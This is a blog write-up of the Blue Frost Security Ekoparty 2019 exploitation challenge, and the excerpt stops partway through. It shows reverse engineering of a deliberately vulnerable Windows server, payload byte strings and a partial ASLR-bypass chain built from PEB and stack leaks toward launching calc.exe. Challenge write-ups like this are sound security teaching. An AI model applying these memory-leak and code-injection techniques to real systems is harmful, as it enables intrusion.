<div class="MsoNormal" style="margin: 0in 0in 0.0001pt;">
<span lang="EN-US" style="font-family: "trebuchet ms" , sans-serif; font-size: large;">Output formatting:<o:p></o:p></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEitVuE1W-rCDiWzx0e6ilwSNB-xnen8BxMyP6lLgKu8BRlppTY05ZH9Vb7Y4-2sFde00r9v6SR9eX6_Q0A0CGJAC7vecibbubOdFgEZKxSQrxbTPsc7Z41zo3mKaxmJYXFxfNNJoR0VpBmG/s1600/Screen+Shot+2019-11-03+at+8.59.07+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: "trebuchet ms" , sans-serif; font-size: large;"><img border="0" data-original-height="762" data-original-width="728" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEitVuE1W-rCDiWzx0e6ilwSNB-xnen8BxMyP6lLgKu8BRlppTY05ZH9Vb7Y4-2sFde00r9v6SR9eX6_Q0A0CGJAC7vecibbubOdFgEZKxSQrxbTPsc7Z41zo3mKaxmJYXFxfNNJoR0VpBmG/s640/Screen+Shot+2019-11-03+at+8.59.07+PM.png" width="609" /></span></a></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt;">
<span style="font-family: "trebuchet ms" , sans-serif; font-size: large;"><br /></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt;">
<span style="font-family: "trebuchet ms" , sans-serif; font-size: large;"><br /></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt;">
<span lang="EN-US"><span style="font-family: "trebuchet ms" , sans-serif; font-size: large;">Happy Hacking!</span><span style="font-family: "cambria";"><o:p></o:p></span></span></div>
Unknownnoreply@blogger.com1tag:blogger.com,1999:blog-2540168616552398462.post-9156227965337023632019-09-12T21:07:00.000+02:002019-09-13T09:50:13.377+02:00Solving the BFS Ekoparty 2019 Exploitation Challenge<div align="center" class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt; text-align: center;">
</div>
<div align="center" class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt; text-align: center;">
<br /></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<a href="https://www.blogger.com/blogger.g?blogID=2540168616552398462" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="https://www.blogger.com/blogger.g?blogID=2540168616552398462" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="https://www.blogger.com/blogger.g?blogID=2540168616552398462" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="https://www.blogger.com/blogger.g?blogID=2540168616552398462" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="https://www.blogger.com/blogger.g?blogID=2540168616552398462" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="https://www.blogger.com/blogger.g?blogID=2540168616552398462" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="https://www.blogger.com/blogger.g?blogID=2540168616552398462" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="https://www.blogger.com/blogger.g?blogID=2540168616552398462" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><span lang="EN-US" style="font-size: 14pt; line-height: 21.466665267944336px;">This is a quick write up about how one of our team members, Thanasis, solved the challenge for EkoParty 2019. This was a fun challenge and thanks to Lukas and Nico from Blue Frost Security for making it happen(and for supporting our community).</span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<span lang="EN-US" style="font-size: 14pt; line-height: 21.466665267944336px;">More information about the challenge can be found at:</span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<span lang="EN-US"><a href="https://labs.bluefrostsecurity.de/blog/2019/09/07/bfs-ekoparty-2019-exploitation-challenge/" style="color: purple;"><span style="font-size: 14pt; line-height: 21.466665267944336px;">https://labs.bluefrostsecurity.de/blog/2019/09/07/bfs-ekoparty-2019-exploitation-challenge/</span></a></span><span lang="EN-US" style="font-size: 14pt; line-height: 21.466665267944336px;"><o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<span lang="EN-US" style="font-size: 14pt; line-height: 21.466665267944336px;">The application as the requirements provided, need to run in windows 10 x64 (RS6) version and the goal is to bypass ASLR and execute a calc.exe process .<o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<span lang="EN-US" style="font-size: 14pt; line-height: 21.466665267944336px;">By opening the application we can see via netstat that it binds on port 54321 on 0.0.0.0 (all the machine’s interfaces).<o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<span lang="EN-US" style="font-size: 14pt; line-height: 21.466665267944336px;">By opening Ghidra and going to the main function it is obvious that some checks need to bypassed in order to correctly send a payload to the application.<o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<span lang="EN-US" style="font-size: 14pt; line-height: 21.466665267944336px;">In Ghidra, if we check the function that is called after the new connection is accepted, we see this:</span> </div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjYJMt6NkMsa279VihQVTmRhfvSah6KkJI4_sJW2klLk1Gazwr_fyu9b0Y_QeEtan4IBAFdw9CCCIAvc8PPue1nWb7Wzl9HFzUKYk8sxzRVBzWjjn2JVVoNkYsO2koXvEtDleis_ggFbOh/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="927" data-original-width="975" height="380" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjYJMt6NkMsa279VihQVTmRhfvSah6KkJI4_sJW2klLk1Gazwr_fyu9b0Y_QeEtan4IBAFdw9CCCIAvc8PPue1nWb7Wzl9HFzUKYk8sxzRVBzWjjn2JVVoNkYsO2koXvEtDleis_ggFbOh/s400/1.png" width="400" /></a></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<span lang="EN-US" style="font-size: 14pt; line-height: 21.466665267944336px;"><br /></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<span lang="EN-US" style="font-size: 14pt; line-height: 21.466665267944336px;">Upon first check, it checks for the first 0x10 bytes(16 chars) as a header. <o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<span lang="EN-US" style="font-size: 14pt; line-height: 21.466665267944336px;">The second and third checks: If the header starts with 0x393130326f6b45(Ekoparty2019) then we are allowed to send a user_message as long as it is smaller than 0x201 bytes(513 chars).<o:p></o:p></span></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<span lang="EN-US" style="font-size: 14pt; line-height: 21.466665267944336px;">The last fourth check is quite important, we can send all this packet structure but it needs to be aligned correctly for 8 bytes. Meaning we could send 16,24,32 and so on.</span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<span lang="EN-US" style="font-size: 14pt; line-height: 21.466665267944336px;">After we succeed in sending a big buffer, it appears that the application crashes after 529 bytes or so. By sending 528 bytes structured correctly with the cookie </span><span lang="EN-US" style="font-size: 14pt; line-height: 21.466665267944336px;">included in the beginning, we notice that before the calling function </span><span lang="EN-US" style="font-size: 14pt; line-height: 21.466665267944336px;">sub_140001170, we actually control the RAX, which is the 513 bytes</span><span lang="EN-US" style="font-size: 14pt; line-height: 21.466665267944336px;">.</span><span lang="EN-US" style="font-family: "cmr12"; font-size: 12pt; line-height: 18.399999618530273px;"><o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<span lang="EN-US" style="font-family: "cmr12"; font-size: 12pt; line-height: 18.399999618530273px;">Before this, there is this instruction<o:p></o:p></span></div>
<table border="1" cellpadding="0" cellspacing="0" class="MsoTableGrid" style="border-collapse: collapse; border: none; color: black;"><tbody>
<tr><td style="border: 1pt solid windowtext; padding: 0in 5.4pt; width: 6.65in;" valign="top" width="479"><div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: normal; margin: 0in 0in 0.0001pt;">
<span lang="EN-US" style="font-family: "cmr12"; font-size: 12pt;">lea rcx, unk_7FF6A8A9E520<o:p></o:p></span></div>
</td></tr>
</tbody></table>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<span lang="EN-US" style="font-family: "cmr12"; font-size: 12pt; line-height: 18.399999618530273px;"> unk_7FF6A8A9E520, holds an array with this structure<o:p></o:p></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjBANSs_l01wnnBjyI1GlGMBVN9uchk3Y-EAn4Rjvediibid1tBr7CmCw_BF39Il9MkYSqr-YbAdjg-z0A-ua5qPSCs6mGVP-RwC7j3ufv-F7s9cdcX_rjiDGdsNa49J8p0sHumESPCLQSo/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="324" data-original-width="1103" height="116" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjBANSs_l01wnnBjyI1GlGMBVN9uchk3Y-EAn4Rjvediibid1tBr7CmCw_BF39Il9MkYSqr-YbAdjg-z0A-ua5qPSCs6mGVP-RwC7j3ufv-F7s9cdcX_rjiDGdsNa49J8p0sHumESPCLQSo/s400/2.png" width="400" /></a></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<span lang="EN-US" style="font-family: "cmr12"; font-size: 12pt; line-height: 18.399999618530273px;"><br /></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<span lang="EN-US" style="font-family: "cmr12"; font-size: 12pt; line-height: 18.399999618530273px;"></span><span lang="EN-US" style="font-family: "cmr12"; font-size: 12pt; line-height: 18.399999618530273px;"><o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<span lang="EN-US" style="font-size: 14pt; line-height: 21.466665267944336px;">By sending the 513 characters, for example as A or \x41 we can make it so the function will return our byte + the rest of the pattern. In this case c3c3c3c3 + ourbyte+488b01.<o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<span lang="EN-US" style="font-size: 14pt; line-height: 21.466665267944336px;">The function </span><span lang="EN-US" style="font-size: 14pt; line-height: 21.466665267944336px;">sub_140001170 before it returns this value turns it to little endian, making it ourbyte+488b01c3c3c3c3. So we get 41488b01c3c3c3c3.<o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<span lang="EN-US" style="font-size: 14pt; line-height: 21.466665267944336px;">This value will be used in WriteProcessMemory as lpBuffer, basically copying these bytes to the function sub_7FF6A8A91000 as instructions allowing to control what we can execute when we reach it.<o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<span lang="EN-US" style="font-size: 14pt; line-height: 21.466665267944336px;">Although this is quite good, it provides a limitation of instructions, meaning we can only use instructions byte+488b01c3c3c3c3.<o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<span lang="EN-US" style="font-size: 14pt; line-height: 21.466665267944336px;">I made a quick script in python producing all the values in a file<o:p></o:p></span></div>
<table border="1" cellpadding="0" cellspacing="0" class="MsoTableGrid" style="border-collapse: collapse; border: none; color: black;"><tbody>
<tr><td style="border: 1pt solid windowtext; padding: 0in 5.4pt; width: 6.65in;" valign="top" width="479"><div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: normal; margin: 0in 0in 0.0001pt;">
<span lang="EN-US" style="font-size: 14pt;">byte=0x00<o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: normal; margin: 0in 0in 0.0001pt;">
<span lang="EN-US" style="font-size: 14pt;">endbyte=0xff<o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: normal; margin: 0in 0in 0.0001pt;">
<span lang="EN-US" style="font-size: 14pt;">start ="848b01c3c3c3"<o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: normal; margin: 0in 0in 0.0001pt;">
<span lang="EN-US" style="font-size: 14pt;">for i in xrange(byte,endbyte+1):<o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: normal; margin: 0in 0in 0.0001pt;">
<span lang="EN-US" style="font-size: 14pt;"> print format(i,'X')+ start<o:p></o:p></span></div>
</td></tr>
</tbody></table>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<span lang="EN-US" style="font-size: 14pt; line-height: 21.466665267944336px;">With a one-liner bash I got all the values:<o:p></o:p></span></div>
<table border="1" cellpadding="0" cellspacing="0" class="MsoTableGrid" style="border-collapse: collapse; border: none; color: black;"><tbody>
<tr><td style="border: 1pt solid windowtext; padding: 0in 5.4pt; width: 6.65in;" valign="top" width="479"><div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: normal; margin: 0in 0in 0.0001pt;">
<span lang="EN-US" style="font-size: 14pt;">for i in $(cat list_instructions);do echo -e "\n$i" && rasm2 -b 64 -D $i ; done > instructions<o:p></o:p></span></div>
</td></tr>
</tbody></table>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<br /></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<span lang="EN-US" style="font-size: 14pt; line-height: 21.466665267944336px;">One good thing in this case is that we can actually control the RCX from our input buffer with the characters provided from 513 till 528.<o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<span lang="EN-US" style="font-size: 14pt; line-height: 21.466665267944336px;">The first thing I had to do was, get the process address from PEB.<o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<span lang="EN-US" style="font-size: 14pt; line-height: 21.466665267944336px;">By sending in our payload these are the last bytes: <o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<span lang="EN-US" style="font-size: 14pt; line-height: 21.466665267944336px;">“\x<span style="color: #c00000;">65</span>\x65\x65\x65\x65\x65\x65\x65\x<span style="color: #c00000;">60</span>\x00\x00\x00\x00\x00\x00\x00”<o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<span lang="EN-US" style="font-size: 14pt; line-height: 21.466665267944336px;">We could achieve and acquire the PEB. \x65 is meant for the combination from the previous instructions.<o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<span lang="EN-US" style="background-color: white; font-size: 14pt; line-height: 21.466665267944336px;">65488b01c3 <o:p></o:p></span></div>
<table border="1" cellpadding="0" cellspacing="0" class="MsoTableGrid" style="border-collapse: collapse; border: none; color: black;"><tbody>
<tr><td style="border: 1pt solid windowtext; padding: 0in 5.4pt; width: 6.65in;" valign="top" width="479"><div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: normal; margin: 0in 0in 0.0001pt;">
<span lang="EN-US" style="background-color: white; font-family: "courier new";">0: 65 48 8b 01 mov rax,QWORD PTR gs:[rcx]</span><span lang="EN-US" style="font-family: "courier new";"><br /><span style="background-color: white; background-position: initial initial; background-repeat: initial initial;">4: c3 ret</span></span><span lang="EN-US" style="font-size: 14pt;"><o:p></o:p></span></div>
</td></tr>
</tbody></table>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<br /></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<span lang="EN-US" style="font-size: 14pt; line-height: 21.466665267944336px;">It is well known that in x64 bit windows, GS register is a special register which points to PEB by providing the accurate offset. In this case since we could control RCX, we pointer GS directly to the PEB which is at offset 0x60 hence the highlighting.<o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<span lang="EN-US" style="font-size: 14pt; line-height: 21.466665267944336px;">Since the application will always sends us back the data leaked we can get this address and use it.<o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<span lang="EN-US" style="font-size: 14pt; line-height: 21.466665267944336px;">The next step would be to get the Image Base Address of the application.<o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<span lang="EN-US" style="font-size: 14pt; line-height: 21.466665267944336px;">Image Base Address is located from the PEB + 0x10 offset. In this case we had to set the address + 0x10 as a pointer to RCX to be able to leak the address.<o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<span lang="EN-US" style="font-size: 14pt; line-height: 21.466665267944336px;">In this case, according to our possible instructions we chose:<o:p></o:p></span></div>
<table border="1" cellpadding="0" cellspacing="0" class="MsoTableGrid" style="border-collapse: collapse; border: none; color: black;"><tbody>
<tr><td style="border: 1pt solid windowtext; padding: 0in 5.4pt; width: 6.65in;" valign="top" width="479"><div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: normal; margin: 0in 0in 0.0001pt;">
<span lang="EN-US" style="background-color: white; font-family: "courier new";">0: 47 8b 01 mov rax,QWORD PTR [rcx]</span><span lang="EN-US" style="font-family: "courier new";"><br /><span style="background-color: white; background-position: initial initial; background-repeat: initial initial;">3: c3 ret</span></span><span lang="EN-US" style="font-size: 14pt;"><o:p></o:p></span></div>
</td></tr>
</tbody></table>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<span lang="EN-US" style="font-size: 14pt; line-height: 21.466665267944336px;">The first byte 47 and these as before are the last bytes of our payload:<o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<span lang="EN-US" style="font-size: 14pt; line-height: 21.466665267944336px;">“\x<span style="color: red;">47</span>\x65\x65\x65\x65\x65\x65\x65 + address+0x10”<o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<span lang="EN-US" style="font-size: 14pt; line-height: 21.466665267944336px;"><br />As an end goal we need to create a ROP chain to execute calc.exe.<o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<span lang="EN-US" style="font-size: 14pt; line-height: 21.466665267944336px;">Since we would like to bypass ASLR, leakage is already useful but in case we would need to execute something, we would have to bypass DEP as well.<o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<span lang="EN-US" style="font-size: 14pt; line-height: 21.466665267944336px;">In this case it is good that we have, in the beginning of the application, a winexec call.</span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPEHnKbShIOV2tR-zaAYDA2ELv01uzGAVA0lWHGjXZChzaT6_zEXv_PiWW0IFmVCZsEV6sgfk9a0ShrZWsd3QvAIV7CnmZFXdTFPFcy6JhE1y-ug0Qzq-p75VMjZLgDiRGbAkv_nW-VA9_/s1600/3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="664" data-original-width="975" height="271" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPEHnKbShIOV2tR-zaAYDA2ELv01uzGAVA0lWHGjXZChzaT6_zEXv_PiWW0IFmVCZsEV6sgfk9a0ShrZWsd3QvAIV7CnmZFXdTFPFcy6JhE1y-ug0Qzq-p75VMjZLgDiRGbAkv_nW-VA9_/s400/3.png" width="400" /></a></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<span lang="EN-US" style="font-size: 14pt; line-height: 21.466665267944336px;"><br /></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<span lang="EN-US" style="font-size: 14pt; line-height: 21.466665267944336px;"></span><span lang="EN-US" style="font-size: 14pt; line-height: 21.466665267944336px;"><o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<span lang="EN-US" style="font-size: 14pt; line-height: 21.466665267944336px;">Therefore, in the end we will call calc.exe through winexec but, winexec requires that the application will be executed to be pointed at, hence a pointer that points to the string calc.exe and a null terminator.<o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<span lang="EN-US" style="font-size: 14pt; line-height: 21.466665267944336px;">Somehow I had to be able to find that place in memory with my string. The best way was to get the StackBase Limit and get towards the stack base to find where it is.<o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<span lang="EN-US" style="font-size: 14pt; line-height: 21.466665267944336px;">First, I had to leak StackBase Limit.<o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<span lang="EN-US" style="font-size: 14pt; line-height: 21.466665267944336px;">StackBaseLimit is in the TEB at 0x10 offset through the GS register.<o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<span lang="EN-US" style="font-size: 14pt; line-height: 21.466665267944336px;">The initial request I used :<o:p></o:p></span></div>
<table border="1" cellpadding="0" cellspacing="0" class="MsoTableGrid" style="border-collapse: collapse; border: none; color: black;"><tbody>
<tr><td style="border: 1pt solid windowtext; padding: 0in 5.4pt; width: 6.65in;" valign="top" width="479"><div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: normal; margin: 0in 0in 0.0001pt;">
<span lang="EN-US" style="background-color: white; font-family: "courier new";">0: 65 48 8b 01 mov rax,QWORD PTR gs:[rcx]</span><span lang="EN-US" style="font-family: "courier new";"><br /><span style="background-color: white; background-position: initial initial; background-repeat: initial initial;">4: c3 ret</span></span><span lang="EN-US" style="font-size: 14pt;"><o:p></o:p></span></div>
</td></tr>
</tbody></table>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<span lang="EN-US" style="font-size: 14pt; line-height: 21.466665267944336px;">I controlled the RCX by setting it to 0x10.<o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<span lang="EN-US" style="font-size: 14pt; line-height: 21.466665267944336px;">After actually getting the leaked address of the Stack Base Limit, it is time for a loop towards the Stack Base to find the correct string which would be calc.exe.<o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<span lang="EN-US" style="font-size: 14pt; line-height: 21.466665267944336px;">By doing a loop, I started leaking the memory cells of the stack up to a point where it detected my string.<o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<span lang="EN-US" style="font-size: 14pt; line-height: 21.466665267944336px;">The moment the string was found, I saved into a counter and multiplied by 0x08 to get how many cells down the stack I had to go.<o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<span lang="EN-US" style="font-size: 14pt; line-height: 21.466665267944336px;">So now I had the address of the string.<o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<span lang="EN-US" style="font-size: 14pt; line-height: 21.466665267944336px;">In the above scenario I used: <o:p></o:p></span></div>
<table border="1" cellpadding="0" cellspacing="0" class="MsoTableGrid" style="border-collapse: collapse; border: none; color: black;"><tbody>
<tr><td style="border: 1pt solid windowtext; padding: 0in 5.4pt; width: 6.65in;" valign="top" width="479"><div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: normal; margin: 0in 0in 0.0001pt;">
<span lang="EN-US" style="background-color: white; font-family: "courier new";">0: 47 8b 01 mov rax,QWORD PTR [rcx]</span><span lang="EN-US" style="font-family: "courier new";"><br /><span style="background-color: white; background-position: initial initial; background-repeat: initial initial;">3: c3 ret</span></span><span lang="EN-US" style="font-size: 14pt;"><o:p></o:p></span></div>
</td></tr>
</tbody></table>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<br /></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<span lang="EN-US" style="font-size: 14pt; line-height: 21.466665267944336px;">With RCX as the Stack Base Limit and constantly adding 0x08 to it.<o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<span lang="EN-US" style="font-size: 14pt; line-height: 21.466665267944336px;">The next step would be to get the winexec’s address on the stack. By checking the .rdata of the application I could see the offset of it.<o:p></o:p></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg0Na-nZmWFMib8Yu7PPxjsIs_9jm5QUeoDLzqogWx87wRtD-GXZGqYVaQ3i2hn0miBwshYja_uzdT_eFeju7kgoSR50lRQPNU8vD49geU2HRVkN_BlS-D-m7kQxzNkfLrU3poDrq4ylerk/s1600/4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="67" data-original-width="975" height="26" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg0Na-nZmWFMib8Yu7PPxjsIs_9jm5QUeoDLzqogWx87wRtD-GXZGqYVaQ3i2hn0miBwshYja_uzdT_eFeju7kgoSR50lRQPNU8vD49geU2HRVkN_BlS-D-m7kQxzNkfLrU3poDrq4ylerk/s400/4.png" width="400" /></a></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<span lang="EN-US" style="font-size: 14pt; line-height: 21.466665267944336px;"><br /></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<span lang="EN-US" style="font-size: 14pt; line-height: 21.466665267944336px;"></span><span lang="EN-US" style="font-size: 14pt; line-height: 21.466665267944336px;"><o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<span lang="EN-US" style="font-size: 14pt; line-height: 21.466665267944336px;">In this case, I need to leak the address from Image Base Address + 0x9010 offset.<o:p></o:p></span></div>
<div class="MsoNormal" style="font-family: Calibri; font-size: 11pt; line-height: 16.866666793823242px; margin: 0in 0in 10pt;">
<span lang="EN-US" style="font-size: 14pt; line-height: 21.466665267944336px;">By using exactly the same instructions as before:<o:p></o:p></span></div>
<table border="1" cellpadding="0" cellspacing="0" class="MsoTableGrid" style="border-collapse: collapse; border: none; color: black;"><tbody>
